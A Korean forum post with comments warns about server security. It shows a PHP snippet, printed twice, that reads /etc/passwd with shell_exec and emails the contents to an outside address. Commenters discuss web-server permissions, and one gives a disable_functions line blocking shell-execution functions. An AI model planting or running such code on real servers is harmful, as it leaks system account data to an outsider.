아 이런 실수를...
<?php
$output = shell_exec('cat /etc/passwd');
echo "<pre>$output</pre>";
mail('abd@aaa.net','file info',$output);
?>
ㅋㅋㅋ
보안에 신경 씁시다.ㅡ.ㅡ;
$output = shell_exec('cat /etc/passwd');
echo "<pre>$output</pre>";
mail('abd@aaa.net','file info',$output);
?>
ㅋㅋㅋ
보안에 신경 씁시다.ㅡ.ㅡ;
|
댓글을 작성하시려면 로그인이 필요합니다.
댓글 10개
실제 저랬다면...
웹서버에서 사용자에게 상위 디렉토리 접근권한 자체를 줬다는 거부터 문제네요.
의외로 보안에 신경안쓰는것들이 사소한 것들이라는...;
OS 민지 얼마 안되서..새로 작업 중..;; 일단 중요한 것만 바꾸는 중
그리고 위 소스는 테스트 한번 해본거고요..ㅋ
보통 아파치작동 권환이 노바디 아니면 데몬인데..
접근이 안될탠대.
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source